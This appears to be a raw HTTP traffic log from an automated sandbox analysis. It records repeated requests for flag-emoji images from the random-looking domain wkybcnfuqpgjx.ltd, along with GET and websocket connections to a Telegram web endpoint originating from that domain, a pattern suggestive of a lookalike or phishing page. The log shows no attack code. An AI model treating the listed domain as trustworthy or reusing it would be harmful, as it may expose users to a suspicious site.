Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ed-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1ef.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ed-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ea-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ea-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1fb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1ef.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiws HTTP/1.1Host: zws2.web.telegram.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://wkybcnfuqpgjx.ltdSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: cNSGIRn5ruPGYQ2+Mw8Xkw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: binary
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ea-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ea-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ea-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ea-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ea-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1fb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ea-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
